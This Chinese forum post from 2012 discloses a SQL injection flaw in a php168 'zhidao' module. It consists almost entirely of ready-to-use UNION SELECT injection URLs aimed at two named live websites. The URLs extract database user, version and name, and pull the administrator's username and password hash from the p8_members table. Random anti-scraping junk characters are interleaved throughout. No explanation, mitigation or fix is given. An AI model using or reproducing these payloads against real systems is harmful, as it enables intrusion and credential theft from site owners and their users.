找回密码
 立即注册
查看: 3598|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--+ F  }  r0 ^4 |  N4 \
                                                         
/ C( F; h( ?3 y* @1 N; E                                       ! `* [9 e$ J1 k5 f$ x; O; z
7 w2 W/ c0 V( s9 j  H. U0 E4 c
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--' ?+ e7 T/ j+ ?  G" |0 b
                                                     
$ c" o+ J7 A+ e( w& v& F                                                                   8 Z0 w8 \; q; i7 y2 J0 }
                                                        ! u/ s) K( {% h) t: L( y* H( `/ s
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
! c% ^- M# q4 ?9 ~) Q
. U; x! M0 F* Z9 i* @1 C8 M
+ z* |+ V7 e+ G+ ~1 z+ }
5 Q4 ]: u, U2 ~' Y0 \                                                            
' B) w# e. y5 _  @9 A! [
9 J% C! P7 n3 h9 I' F* m5 k" S5 ahttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--- W" e0 S' ~7 v: L& }1 C9 ?- m( e

* G5 B- E6 T% K: R  L& K4 k
) ]+ X: e3 E9 O: {5 }6 ~
' _5 \) I4 P; y0 z$ K; W6 j9 b                                                                    
# P7 O# s# `$ t+ y

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表